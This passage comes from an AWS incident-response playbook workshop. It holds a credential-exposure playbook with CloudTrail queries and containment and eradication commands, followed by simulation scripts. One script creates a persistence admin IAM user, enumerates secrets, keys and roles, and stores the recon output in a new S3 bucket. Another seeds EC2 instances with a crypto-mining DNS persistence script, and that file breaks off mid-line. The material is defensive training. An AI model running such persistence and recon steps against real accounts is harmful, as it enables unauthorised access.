| aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/secretsmanager.list-secrets | 1 312 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/iam.list-roles | 1 313 | 198.51.100.77 | [aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/s3api.create-bucket] | 1 314 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/kms.list-aliases | 1 315 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/logs.describe-destinations | 1 316 | 72.21.198.71 | [aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/s3api.list-buckets] | 1 317 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/kms.list-keys | 1 318 | 319 | * No new source IP addresses surfaced 320 | * We need to analyze the changes made with the CreateBucket, and PutObject API calls. 321 | * We need to analyze the probing made with the ListRoles, DescribeDestinations, ListKeys, ListFunctions20150331, ListBuckets, ListSecrets, ListAliases, and DescribeInstances API calls. 322 | 323 | ``` 324 | -- retrieve additional information about the rogue user changes 325 | SELECT eventtime, awsregion, eventname, requestparameters, responseelements, errorcode, errormessage 326 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 327 | WHERE useridentity.username = 'JaneDoe' 328 | AND date_partition >= '2021/07/16' 329 | AND date_partition <= '2021/07/24' 330 | AND eventname IN ('CreateBucket', 'PutObject') 331 | ``` 332 | 333 | eventtime | awsregion | eventname | requestparameters | responseelements | errorcode | errormessage 334 | ----------------------|-------------|----------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------|-------------|-------------- 335 | 2021-07-24T02:22:56Z | us-east-1 | CreateBucket | {"bucketName":"DOC-EXAMPLE-BUCKET","Host":"DOC-EXAMPLE-BUCKET.s3.us-east-1.amazonaws.com"} | null | | 336 | 2021-07-24T02:22:57Z | us-east-1 | PutObject | {"bucketName":"DOC-EXAMPLE-BUCKET","Host":"DOC-EXAMPLE-BUCKET.s3.us-east-1.amazonaws.com","key":"stuff"} | null | | 337 | 338 | * S3 Bucket name ```DOC-EXAMPLE-BUCKET``` was created and an object with key ```stuff``` was placed in it. 339 | 340 | ``` 341 | -- retrieve additional information about the rogue user probing 342 | SELECT eventtime, awsregion, requestparameters, responseelements, errorcode, errormessage 343 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 344 | WHERE useridentity.username = 'JaneDoe' 345 | AND date_partition >= '2021/07/16' 346 | AND date_partition <= '2021/07/24' 347 | AND eventname IN ('ListRoles', 'DescribeDestinations', 'ListKeys', 'ListFunctions20150331', 'ListBuckets', 'ListSecrets', 'ListAliases', 'DescribeInstances') 348 | ``` 349 | 350 | eventtime | awsregion | requestparameters | responseelements | errorcode | errormessage 351 | ----------------------|-------------|-----------------------------------------|--------------------|-------------|-------------- 352 | 2021-07-24T02:22:45Z | us-east-1 | null | null | | 353 | 2021-07-24T02:22:48Z | us-east-1 | null | null | | 354 | 2021-07-24T02:22:51Z | us-east-1 | {"Host":"s3.us-east-1.amazonaws.com"} | null | | 355 | 2021-07-24T02:22:52Z | us-east-1 | {"instancesSet":{},"filterSet":{}} | null | | 356 | 2021-07-24T02:22:53Z | us-east-1 | null | null | | 357 | 2021-07-24T02:22:46Z | us-east-1 | null | null | | 358 | 2021-07-24T02:22:49Z | us-east-1 | null | null | | 359 | 2021-07-24T02:22:50Z | us-east-1 | null | null | | 360 | 361 | * CloudTrail does not hold the information about the probed resources. 362 | 363 | * Attempt to retrieve the object from the S3 Bucket using AWS CLI: 364 | ``` 365 | aws s3api get-object --bucket DOC-EXAMPLE-BUCKET --key stuff stuff --profile SecurityAnalystRole 366 | 367 | { 368 | "AcceptRanges": "bytes", 369 | "LastModified": "2021-07-24T02:22:58+00:00", 370 | "ContentLength": 43860, 371 | "ETag": "\"3551a9d2-22cd-481e-92ee-639334e18c43\"", 372 | "ContentType": "binary/octet-stream", 373 | "Metadata": {} 374 | } 375 | ``` 376 | 377 | * The contents of the file are the outputs of the probing API calls ```../evidence/stuff ``` 378 | 379 | * Attempt to retrieve the S3 Bucket policy using AWS CLI: 380 | ``` 381 | aws s3api get-bucket-policy --bucket DOC-EXAMPLE-BUCKET --profile SecurityAnalystRole 382 | 383 | An error occurred (NoSuchBucketPolicy) when calling the GetBucketPolicy operation: The bucket policy does not exist 384 | 385 | ``` 386 | 387 | * Attempt to retrieve the S3 Bucket ACL using AWS CLI: 388 | ``` 389 | aws s3api get-bucket-acl --bucket DOC-EXAMPLE-BUCKET --profile SecurityAnalystRole 390 | 391 | { 392 | "Owner": { 393 | "DisplayName": "maymajor", 394 | "ID": "e810532a-fef5-4ebd-b8f4-2ca52fea3b46" 395 | }, 396 | "Grants": [ 397 | { 398 | "Grantee": { 399 | "DisplayName": "maymajor", 400 | "ID": "e810532a-fef5-4ebd-b8f4-2ca52fea3b46", 401 | "Type": "CanonicalUser" 402 | }, 403 | "Permission": "FULL_CONTROL" 404 | } 405 | ] 406 | } 407 | 408 | ``` 409 | 410 | * * * 411 | 412 | ### Part 3: Analysis - Impact 413 | 414 | Parse through the distilled information looking for patterns, extrapolate into behaviors that contrast with expected baseline of approved activity. Take a holistic approach looking at the data presented to you and continuously ask yourself if the constructed patterns represent normal behavior, external actor, or insider. The following questions will serve as a guide, but don’t limit yourself, expand based on your own findings and doubts. Make sure to have *data* backing up your answers: 415 | 416 | 1. What related alerts have been triggered? 417 | * No related alerts have been triggered 418 | 2. What is the classification of the data accessed? 419 | * The service resource's configuration probed by the actor is classified as "Internal" 420 | 3. What AWS services are not in the approved use list? 421 | * All services accessed by the actor are allowed to be used by authorized users 422 | 4. What AWS service configurations have been changed? 423 | * S3 Bucket name ```DOC-EXAMPLE-BUCKET``` was created and an object with key ```stuff``` was placed in it. 424 | * The IAM User ```JaneDoe``` was created with the AWS managed policy ```AdministratorAccess``` attached and Access Key ID ```AKIAI44QH8DHBEXAMPLE```. 425 | 5. What guardrails have been disabled or modified? 426 | * None 427 | 6. Was the actor an insider or outsider? 428 | * An internal investigation has started, at the moment no evidence of insider activity 429 | 7. What evidence supports benign and malicious activity? 430 | * API calls logged in CloudTrail 431 | * Object (text file) uploaded by actor to S3 bucket contains probing information 432 | 8. What is the impact to business applications and processes? 433 | * Escalating to owner of exposed credential. This credential was for a test in the development environment and has not affected production. 434 | 9. Is there any indication of possible data exfiltration? 435 | * Yes, probing information about the development account ```777777777777``` resources 436 | 437 | * * * 438 | 439 | ### Part 4: Containment 440 | 441 | The user ```JorgeSouza``` was the initial compromise vector, which created another user ```JaneDoe``` which in turn created the S3 bucket ```DOC-EXAMPLE-BUCKET```. 442 | 443 | #### Resource list for account ```777777777777```: 444 | * S3 Bucket: ```DOC-EXAMPLE-BUCKET``` 445 | * IAM User: ```JorgeSouza``` and IAM Access Key ID: ```AKIAIOSFODNN7EXAMPLE``` 446 | * IAM User: ```JaneDoe``` and IAM Access Key ID: ```AKIAI44QH8DHBEXAMPLE``` 447 | 448 | #### Containment actions: 449 | 450 | * Disable IAM Access Key IDs ```AKIAIOSFODNN7EXAMPLE``` and ```AKIAI44QH8DHBEXAMPLE``` and verify: 451 | 452 | Please note IAM is [eventually consistent](https://docs.aws.amazon.com/IAM/latest/UserGuide/troubleshoot_general.html#troubleshoot_general_eventual-consistency), if during verification the ```"Status"``` shows ```"Active"```, just ```list-access-keys again``` and the ```"Status"``` will eventually show up as ```"Inactive"```. 453 | 454 | ``` 455 | aws iam update-access-key --access-key-id AKIAIOSFODNN7EXAMPLE --status Inactive --user-name JorgeSouza --profile SecurityBreakGlassRole 456 | (no output) 457 | 458 | 459 | aws iam list-access-keys --user-name JorgeSouza 460 | { 461 | "AccessKeyMetadata": [ 462 | { 463 | "UserName": "JorgeSouza", 464 | "AccessKeyId": "AKIAIOSFODNN7EXAMPLE", 465 | "Status": "Inactive", 466 | "CreateDate": "2021-07-24T02:31:19+00:00" 467 | } 468 | ] 469 | } 470 | 471 | 472 | aws iam update-access-key --access-key-id AKIAI44QH8DHBEXAMPLE --status Inactive --user-name JaneDoe --profile SecurityBreakGlassRole 473 | (no output) 474 | 475 | aws iam list-access-keys --user-name JaneDoe 476 | { 477 | "AccessKeyMetadata": [ 478 | { 479 | "UserName": "JaneDoe", 480 | "AccessKeyId": "AKIAI44QH8DHBEXAMPLE", 481 | "Status": "Inactive", 482 | "CreateDate": "2021-07-24T02:22:34+00:00" 483 | } 484 | ] 485 | } 486 | 487 | ``` 488 | 489 | * Attach the following policy to IAM Users ```JaneDoe``` and ```JorgeSouza``` and verify: 490 | 491 | ``` 492 | { 493 | "Version": "2012-10-17", 494 | "Statement": [ 495 | { 496 | "Sid": "IamPolicyForContainment", 497 | "Action": "*", 498 | "Effect": "Deny", 499 | "Resource": "*" 500 | } 501 | ] 502 | } 503 | ``` 504 | 505 | ``` 506 | aws iam create-policy --policy-name iam-containment-policy --policy-document file://containment/iam_containment_policy.json --profile SecurityBreakGlassRole 507 | { 508 | "Policy": { 509 | "PolicyName": "iam-containment-policy", 510 | "PolicyId": "ANPAJ2UCCR6DPCEXAMPLE", 511 | "Arn": "arn:aws:iam::777777777777:policy/iam-containment-policy", 512 | "Path": "/", 513 | "DefaultVersionId": "v1", 514 | "AttachmentCount": 0, 515 | "PermissionsBoundaryUsageCount": 0, 516 | "IsAttachable": true, 517 | "CreateDate": "2021-07-26T00:37:18+00:00", 518 | "UpdateDate": "2021-07-26T00:37:18+00:00" 519 | } 520 | } 521 | aws iam attach-user-policy --policy-arn arn:aws:iam::777777777777:policy/iam-containment-policy --user-name JorgeSouza --profile SecurityBreakGlassRole 522 | (no output) 523 | 524 | aws iam list-attached-user-policies --user-name JorgeSouza 525 | { 526 | "AttachedPolicies": [ 527 | { 528 | "PolicyName": "iam-containment-policy", 529 | "PolicyArn": "arn:aws:iam::777777777777:policy/iam-containment-policy" 530 | }, 531 | { 532 | "PolicyName": "SimulationStack-SystemJorgeSouzaPolicy6FA12ED7-1I709F3HY50FL", 533 | "PolicyArn": "arn:aws:iam::777777777777:policy/SimulationStack-SystemJorgeSouzaPolicy6FA12ED7-1I709F3HY50FL" 534 | } 535 | ] 536 | } 537 | 538 | 539 | aws iam attach-user-policy --policy-arn arn:aws:iam::777777777777:policy/iam-containment-policy --user-name JaneDoe --profile SecurityBreakGlassRole 540 | (no output) 541 | 542 | aws iam list-attached-user-policies --user-name JaneDoe --profile SecurityBreakGlassRole 543 | { 544 | "AttachedPolicies": [ 545 | { 546 | "PolicyName": "AdministratorAccess", 547 | "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess" 548 | }, 549 | { 550 | "PolicyName": "iam-containment-policy", 551 | "PolicyArn": "arn:aws:iam::777777777777:policy/iam-containment-policy" 552 | } 553 | ] 554 | } 555 | 556 | ``` 557 | 558 | * Apply containment policy allowing forensics access without requiring root user for S3 Bucket ```DOC-EXAMPLE-BUCKET```. 559 | 560 | ``` 561 | { 562 | "Version": "2012-10-17", 563 | "Statement": [ 564 | { 565 | "Condition": { 566 | "StringNotLike": { 567 | "aws:PrincipalArn": [ 568 | "arn:aws:iam::777777777777:role/SecurityBreakGlassRole" 569 | ] 570 | } 571 | }, 572 | "Action": "*", 573 | "Resource": [ 574 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET", 575 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*" 576 | ], 577 | "Effect": "Deny", 578 | "Principal": "*", 579 | "Sid": "BucketPolicyForContainment" 580 | } 581 | ] 582 | } 583 | ``` 584 | 585 | ``` 586 | aws s3api put-bucket-policy --bucket DOC-EXAMPLE-BUCKET --policy file://containment/s3_bucket_containment_policy.json --profile SecurityBreakGlassRole 587 | (no output) 588 | 589 | aws s3api get-bucket-policy --bucket DOC-EXAMPLE-BUCKET --profile SecurityBreakGlassRole | jq '[.[]|fromjson]' 590 | [ 591 | { 592 | "Version": "2012-10-17", 593 | "Statement": [ 594 | { 595 | "Sid": "BucketPolicyForContainment", 596 | "Effect": "Deny", 597 | "Principal": "*", 598 | "Action": "*", 599 | "Resource": [ 600 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET", 601 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*" 602 | ], 603 | "Condition": { 604 | "StringNotLike": { 605 | "aws:PrincipalArn": "arn:aws:iam::777777777777:role/master" 606 | } 607 | } 608 | } 609 | ] 610 | } 611 | ] 612 | 613 | 614 | ``` 615 | 616 | * * * 617 | 618 | ### Part 5: Eradication 619 | 620 | #### Resource list for account ```777777777777```: 621 | * S3 Bucket: ```DOC-EXAMPLE-BUCKET``` 622 | * IAM User: ```JorgeSouza``` and IAM Access Key ID: ```AKIAIOSFODNN7EXAMPLE``` 623 | * IAM User: ```JaneDoe``` and IAM Access Key ID: ```AKIAI44QH8DHBEXAMPLE``` 624 | 625 | ***>>>>>THESE ACTIONS ARE FINAL AND UNRECOVERABLE<<<<<*** 626 | 627 | * Delete S3 Bucket 628 | * after preserving the objects in the S3 Bucket, force delete 629 | ``` 630 | aws s3 rb s3://DOC-EXAMPLE-BUCKET --force --profile SecurityBreakGlassRole 631 | delete: s3://DOC-EXAMPLE-BUCKET/stuff 632 | remove_bucket: DOC-EXAMPLE-BUCKET 633 | 634 | ``` 635 | 636 | * Delete IAM Users 637 | 638 | Please note IAM is [eventually consistent](https://docs.aws.amazon.com/IAM/latest/UserGuide/troubleshoot_general.html#troubleshoot_general_eventual-consistency), if during verification the users still exist, they will eventually be deleted. 639 | 640 | ``` 641 | aws iam detach-user-policy --user-name JorgeSouza --policy-arn arn:aws:iam::777777777777:policy/SimulationStack-SystemJorgeSouzaPolicy6FA12ED7-1I709F3HY50FL --profile SecurityBreakGlassRole 642 | (no output) 643 | aws iam detach-user-policy --user-name JorgeSouza --policy-arn arn:aws:iam::777777777777:policy/iam-containment-policy --profile SecurityBreakGlassRole 644 | (no output) 645 | aws iam delete-access-key --user-name JorgeSouza --access-key-id AKIAIOSFODNN7EXAMPLE --profile SecurityBreakGlassRole 646 | (no output) 647 | aws iam delete-user --user-name JorgeSouza --profile SecurityBreakGlassRole 648 | (no output) 649 | aws iam get-user --user-name JorgeSouza --profile SecurityBreakGlassRole 650 | 651 | An error occurred (NoSuchEntity) when calling the GetUser operation: The user with name JorgeSouza cannot be found. 652 | 653 | 654 | 655 | 656 | aws iam detach-user-policy --user-name JaneDoe --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --profile SecurityBreakGlassRole 657 | (no output) 658 | aws iam detach-user-policy --user-name JaneDoe --policy-arn arn:aws:iam::777777777777:policy/iam-containment-policy --profile SecurityBreakGlassRole 659 | (no output) 660 | aws iam delete-access-key --user-name JaneDoe --access-key-id AKIAI44QH8DHBEXAMPLE --profile SecurityBreakGlassRole 661 | (no output) 662 | aws iam delete-user --user-name JaneDoe --profile SecurityBreakGlassRole 663 | (no output) 664 | aws iam get-user --user-name JaneDoe --profile SecurityBreakGlassRole 665 | 666 | An error occurred (NoSuchEntity) when calling the GetUser operation: The user with name JaneDoe cannot be found. 667 | 668 | ``` 669 | 670 | * * * 671 | 672 | ### Part 6: Recovery 673 | 674 | * No recovery steps required 675 | 676 | * * * 677 | 678 | ### Part 7: Post-Incident Activity 679 | 680 | **Recommendations:** 681 | * Automate containment and eradication with AWS CLI or SDK 682 | * Save all Athena queries used in the playbook for faster use 683 | * Pursue eliminating use of long term IAM User Access Keys and adopt short term STS tokens 684 | * Create alerts based on creation of long term IAM User Access Keys 685 | 686 | 687 | -------------------------------------------------------------------------------- /playbooks/credential_exposure/containment/iam_containment_policy.json: -------------------------------------------------------------------------------- 1 | { 2 | "Version": "2012-10-17", 3 | "Statement": [ 4 | { 5 | "Sid": "IamPolicyForContainment", 6 | "Action": "*", 7 | "Effect": "Deny", 8 | "Resource": "*" 9 | } 10 | ] 11 | } -------------------------------------------------------------------------------- /playbooks/credential_exposure/containment/s3_bucket_containment_policy.json: -------------------------------------------------------------------------------- 1 | { 2 | "Version": "2012-10-17", 3 | "Statement": [ 4 | { 5 | "Condition": { 6 | "StringNotLike": { 7 | "aws:PrincipalArn": [ 8 | "arn:aws:iam::777777777777:role/SecurityBreakGlassRole" 9 | ] 10 | } 11 | }, 12 | "Action": "*", 13 | "Resource": [ 14 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET", 15 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*" 16 | ], 17 | "Effect": "Deny", 18 | "Principal": "*", 19 | "Sid": "BucketPolicyForContainment" 20 | } 21 | ] 22 | } -------------------------------------------------------------------------------- /playbooks/credential_exposure/evidence/stuff: -------------------------------------------------------------------------------- 1 | # REDACTED -------------------------------------------------------------------------------- /playbooks/credential_exposure/images/aws_caf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/credential_exposure/images/aws_caf.png -------------------------------------------------------------------------------- /playbooks/credential_exposure/images/nist_life_cycle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/credential_exposure/images/nist_life_cycle.png -------------------------------------------------------------------------------- /playbooks/credential_exposure/simulation/simulate_credential_exposure_activity.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # requirements: AWS CLI profile, jq, AWS Region 6 | # example: ```./simulate_credential_exposure_activity.sh credential_exposure us-east-1``` 7 | # jq download https://stedolan.github.io/jq/download/ 8 | # 9 | # activity generated: 10 | # - creates an IAM User with administrative entitlements 11 | # - creates long term IAM Access Key fornew IAM User 12 | # - performs light recon activity with `list` and `describe` commands using the newly created IAM Access Key 13 | # - creates S3 Bucket and saves light recon output to it 14 | # 15 | PROFILE=${1} 16 | REGION=${2} 17 | PERSISTENCE_USER=$(echo "helpdesk-"$(uuidgen) | awk '{print tolower($0)}') 18 | echo "checking credential account ownership" 19 | aws sts get-caller-identity --profile ${PROFILE} &> /dev/null 20 | echo "creating persistence IAM User" 21 | aws iam create-user --user-name ${PERSISTENCE_USER} --profile ${PROFILE} &> /dev/null 22 | echo "make persistence user administrator" 23 | aws iam attach-user-policy --user-name ${PERSISTENCE_USER} --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --profile ${PROFILE} &> /dev/null 24 | echo "create IAM Access Key for user" 25 | aws iam create-access-key --user-name ${PERSISTENCE_USER} --profile ${PROFILE} > ak.json 26 | # saves current AWS env 27 | echo "preserving existing AWS ENV" 28 | AWS_ID=${AWS_ACCESS_KEY_ID} 29 | AWS_SK=${AWS_SECRET_ACCESS_KEY} 30 | AWS_DR=${AWS_DEFAULT_REGION} 31 | AWS_ST=${AWS_SESSION_TOKEN} 32 | export AWS_ACCESS_KEY_ID=$(jq -r '.AccessKey.AccessKeyId' ak.json) 33 | export AWS_SECRET_ACCESS_KEY=$(jq -r '.AccessKey.SecretAccessKey' ak.json) 34 | export AWS_DEFAULT_REGION=${REGION} 35 | unset AWS_SESSION_TOKEN 36 | echo "deletes IAM Access Key ID and Secret from disk" 37 | rm -f ak.json 38 | error=1 39 | # https://docs.aws.amazon.com/IAM/latest/UserGuide/troubleshoot_general.html#troubleshoot_general_eventual-consistency 40 | while [ ${error} -ne 0 ] 41 | do 42 | echo "waiting ${PERSISTENCE_USER} IAM Access Keys to be available" 43 | aws sts get-caller-identity &> /dev/null 44 | error=${?} 45 | sleep 1 46 | done 47 | # light recon 48 | echo "performing light recon" 49 | aws sts get-caller-identity > recon.txt 50 | aws iam list-roles >> recon.txt 51 | aws lambda list-functions >> recon.txt 52 | aws kms list-keys >> recon.txt 53 | aws kms list-aliases >> recon.txt 54 | aws logs describe-destinations >> recon.txt 55 | aws s3api list-buckets >> recon.txt 56 | aws ec2 describe-instances >> recon.txt 57 | aws secretsmanager list-secrets >> recon.txt 58 | aws sqs list-queues >> recon.txt 59 | BUCKET_NAME=$(echo "simulation-"$(uuidgen) | awk '{print tolower($0)}') 60 | # save recon for posterity 61 | aws s3api create-bucket --bucket ${BUCKET_NAME} &> /dev/null 62 | aws s3api put-object --bucket ${BUCKET_NAME} --key stuff --body recon.txt &> /dev/null 63 | rm -f recon.txt 64 | # restores AWS ENV 65 | echo "restores AWS ENV" 66 | export AWS_SESSION_TOKEN=${AWS_ST} 67 | export AWS_ACCESS_KEY_ID=${AWS_ID} 68 | export AWS_SECRET_ACCESS_KEY=${AWS_SK} 69 | export AWS_DEFAULT_REGION=${AWS_DR} 70 | echo "${BUCKET_NAME}" > bucket.resources 71 | echo "${PERSISTENCE_USER}" > user.resources 72 | echo "resources created to be deleted after playbook is completed" 73 | echo "S3 Bucket $(cat bucket.resources)" 74 | echo "IAM User $(cat user.resources)" 75 | echo "save the files bucket.resources and user.resources for future use by the bash script undo_simulate_credential_exposure_activity.sh" 76 | echo "end of ${0}" 77 | 78 | -------------------------------------------------------------------------------- /playbooks/credential_exposure/simulation/undo_simulate_credential_exposure_activity.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # usage `./undo_simulate_credential_exposure_activity.sh 6 | # requirement: use AWS CloudShell with AssumeRole SecurityBreakGlass 7 | # use case: deletes resources created by simulation using files `bucket.resources and user.resources` as input 8 | # 9 | PERSISTENCE_USER=$(cat user.resources) 10 | BUCKET_NAME=$(cat bucket.resources) 11 | echo "trying to delete IAM User ${PERSISTENCE_USER}" 12 | user_policy_arn=$(aws iam list-attached-user-policies --user-name ${PERSISTENCE_USER} | jq -r '.AttachedPolicies[].PolicyArn') 13 | aws iam detach-user-policy --user-name ${PERSISTENCE_USER} --policy-arn ${user_policy_arn} &> /dev/null 14 | access_key_id=$(aws iam list-access-keys --user-name ${PERSISTENCE_USER} | jq -r '.AccessKeyMetadata[].AccessKeyId') 15 | aws iam delete-access-key --user-name ${PERSISTENCE_USER} --access-key-id ${access_key_id} &> /dev/null 16 | aws iam delete-user --user-name ${PERSISTENCE_USER} &> /dev/null 17 | error=${?} 18 | if [ ${error} -ne 0 ] 19 | then 20 | echo "delete for IAM User ${PERSISTENCE_USER} returned error code ${error}" 21 | else 22 | echo "deletion succeeded for IAM User ${PERSISTENCE_USER} returned code ${error}" 23 | fi 24 | echo "trying to delete S3 Bucket ${BUCKET_NAME}" 25 | aws s3 rb s3:${BUCKET_NAME} --force &> /dev/null 26 | error=${?} 27 | if [ ${error} -ne 252 ] 28 | then 29 | echo "delete for S3 Bucket ${BUCKET_NAME} returned error code ${error}" 30 | else 31 | echo "deletion for S3 Bucket ${BUCKET_NAME} returned code ${error}" 32 | fi 33 | echo "end of ${0}" 34 | 35 | -------------------------------------------------------------------------------- /playbooks/crypto_mining/containment/iam_containment_policy.json: -------------------------------------------------------------------------------- 1 | { 2 | "Version": "2012-10-17", 3 | "Statement": [ 4 | { 5 | "Sid": "IamPolicyForContainment", 6 | "Action": "*", 7 | "Effect": "Deny", 8 | "Resource": "*" 9 | } 10 | ] 11 | } -------------------------------------------------------------------------------- /playbooks/crypto_mining/images/aws_caf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/crypto_mining/images/aws_caf.png -------------------------------------------------------------------------------- /playbooks/crypto_mining/images/nist_life_cycle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/crypto_mining/images/nist_life_cycle.png -------------------------------------------------------------------------------- /playbooks/crypto_mining/response_scripts/retrieve_guardduty_findings.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # requirements: AWS CLI profile, AWS Region, jq, GuardDuty finding type 6 | # example: ```./retrieve_guardduty_findings.sh security_analyst us-east-1 '"CryptoCurrency:EC2/BitcoinTool.B!DNS"'``` 7 | # jq download https://stedolan.github.io/jq/download/ 8 | # GuardDuty finding types https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html 9 | PROFILE=${1} 10 | REGION=${2} 11 | FINDING_TYPE=${3} 12 | detector_id=$(aws guardduty list-detectors --region ${REGION} --profile ${PROFILE} | jq -r '.DetectorIds[]') 13 | echo "detector ID ${detector_id}" 14 | finding_ids=$(aws guardduty list-findings --detector-id ${detector_id} --finding-criteria '{"Criterion": {"type": {"Eq": ['${FINDING_TYPE}']}}}' --region ${REGION} --profile ${PROFILE} | jq -r '.FindingIds[]') 15 | echo "finding IDs ${finding_ids}" 16 | echo "this might take some time, please wait" 17 | instance_ids=$(for finding_id in ${finding_ids}; do aws guardduty get-findings --detector-id ${detector_id} --finding-id ${finding_id} --region ${REGION} --profile ${PROFILE}; done | jq -r '.Findings[].Resource.InstanceDetails.InstanceId') 18 | echo "instance IDs ${instance_ids}" 19 | echo ${instance_ids} > instance_ids.txt 20 | 21 | -------------------------------------------------------------------------------- /playbooks/crypto_mining/simulation/simulate_crypto_mining_activity.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # requirements: AWS CLI profile, jq, AWS Region 6 | # example: ```./simulate_crypto_mining_activity.sh crypto_mining us-east-1``` 7 | # jq download https://stedolan.github.io/jq/download/ 8 | # 9 | # Activity generated: 10 | # - discovery of public Amazon Linux 2 AMIs available in region 11 | # - discovery of VPCs available in AWS account 12 | # - discovery of Networks available in VPCs 13 | # - spin one t2.nano EC2 instance in each subnet for each VPC found 14 | # - EC2 instance has userdata defined in file `userdata.sh` 15 | # - `userdata.sh` performs multiple `dig` commands against known crypto currency related domains. no information 16 | # is exchanged. if GuardDuty is enabled, will trigger crypto mining DNS findings. 17 | PROFILE=${1} 18 | REGION=${2} 19 | echo "retrieving AMZN Linux 2 AMI id" 20 | base_ami=$(aws ec2 describe-images --owners amazon --filters "Name=name,Values=amzn2-ami-hvm-2.0.????????.?-x86_64-gp2" "Name=state,Values=available" --query "reverse(sort_by(Images, &CreationDate))[:1].ImageId" --output text --region ${REGION} --profile ${PROFILE}) 21 | echo "enumerates all VPCs available" 22 | vpcs=$(aws ec2 describe-vpcs --region ${REGION} --profile ${PROFILE} | jq -r '.Vpcs[].VpcId') 23 | echo "" > instances.resources 24 | for vpc in ${vpcs}; do 25 | echo "spinning instances in all subnets of VPC ${vpcs}" 26 | subnets=$(aws ec2 describe-subnets --filters Name="vpc-id",Values="${vpc}" --region ${REGION} --profile ${PROFILE} | jq -r '.Subnets[].SubnetId') 27 | for subnet in ${subnets}; do 28 | spun=$(aws ec2 run-instances --user-data file://userdata.sh --image-id ${base_ami} --subnet-id ${subnet} --instance-type t2.nano --region ${REGION} --profile ${PROFILE}| jq -r '.Instances[].InstanceId') 29 | echo "crypto mining started - EC2 instance ${spun} in subnet ${subnet} of VPC ${vpc} using AMI ${ami_bitcoin}" 30 | echo "${spun} " >> instances.resources 31 | done 32 | done 33 | echo "resources created to be deleted after playbook is completed" 34 | echo "EC2 instances $(cat instances.resources)" 35 | echo "save the file instances.resources for future use by the bash script undo_simulate_crypto_mining_activity.sh" 36 | echo "end of ${0}" 37 | -------------------------------------------------------------------------------- /playbooks/crypto_mining/simulation/undo_simulate_crypto_mining_activity.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # usage `./undo_simulate_crypto_mining_activity.sh 6 | # requirement: use AWS CloudShell with AssumeRole SecurityBreakGlass 7 | # use case: deletes resources created by simulation using file `instances.resources` as input 8 | # 9 | INSTANCES=$(cat instances.resources) 10 | echo "trying to terminate EC2 instances ${INSTANCES}" 11 | for instance in ${INSTANCES}; do 12 | aws ec2 terminate-instances --instance-ids ${instance} &> /dev/null 13 | error=${?} 14 | if [ ${error} -ne 0 ] 15 | then 16 | echo "terminate failed for EC2 instance ${instance} with error ${error}" 17 | fi 18 | done 19 | echo "end of ${0}" 20 | 21 | -------------------------------------------------------------------------------- /playbooks/crypto_mining/simulation/userdata.sh: -------------------------------------------------------------------------------- 1 | Content-Type: multipart/mixed; boundary="//" 2 | MIME-Version: 1.0 3 | 4 | --// 5 | Content-Type: text/cloud-config; charset="us-ascii" 6 | MIME-Version: 1.0 7 | Content-Transfer-Encoding: 7bit 8 | Content-Disposition: attachment; filename="cloud-config.txt" 9 | 10 | #cloud-config 11 | cloud_final_modules: 12 | - [scripts-user, always] 13 | 14 | --// 15 | Content-Type: text/x-shellscript; charset="us-ascii" 16 | MIME-Version: 1.0 17 | Content-Transfer-Encoding: 7bit 18 | Content-Disposition: attachment; filename="userdata.txt" 19 | 20 | #!/bin/bash 21 | mkdir -p /usr/cryptokit 22 | touch /usr/cryptokit/persist.sh 23 | chmod 750 /usr/cryptokit/persist.sh 24 | echo "#!/bin/bash" >> /usr/cryptokit/persist.sh 25 | echo "dig donate.v2.xmrig.com" >> /usr/cryptokit/persist.sh 26 | echo "dig systemten.org" >> /usr/cryptokit/persist.sh 27 | echo "dig 